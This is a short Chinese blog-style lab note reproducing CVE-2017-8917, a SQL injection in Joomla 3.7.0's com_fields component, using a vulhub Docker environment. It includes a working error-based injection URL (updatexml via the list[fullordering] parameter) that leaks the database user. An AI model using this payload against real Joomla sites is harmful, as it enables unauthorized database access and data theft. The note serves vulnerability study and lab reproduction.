(CVE-2017-8917)Joomla 3.7.0 SQL注入漏洞

# Joomla 3.7.0 SQL注入漏洞CVE-2017-8917

#### 简介

漏洞是由此Joomla 3.7.0 版本中引入的新组件(com\_fields)带来的

#### 环境搭建

cd /root/vulhub/joomla/CVE-2017-8917 docker-compose up -d ![](/static/baige/01-CMS漏洞/Joomla/./Joomla 3.7.0 SQL注入漏洞CVE-2017-8917/20200619122952854.png)

启动后访问http://your-ip:8080即可看到Joomla的安装界面 按照顺序安装即可 安装完成后,访问http://your-ip:8080/index.php?option=com\_fields&view=fields&layout=modal&list\[fullordering\]=updatexml(0x23,concat(1,user()),1),即可看到报错信息: ![](/static/baige/01-CMS漏洞/Joomla/./Joomla 3.7.0 SQL注入漏洞CVE-2017-8917/20200619123002609.png)

© 版权声明
THE END
喜欢就支持一下吧
点赞0赞赏 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容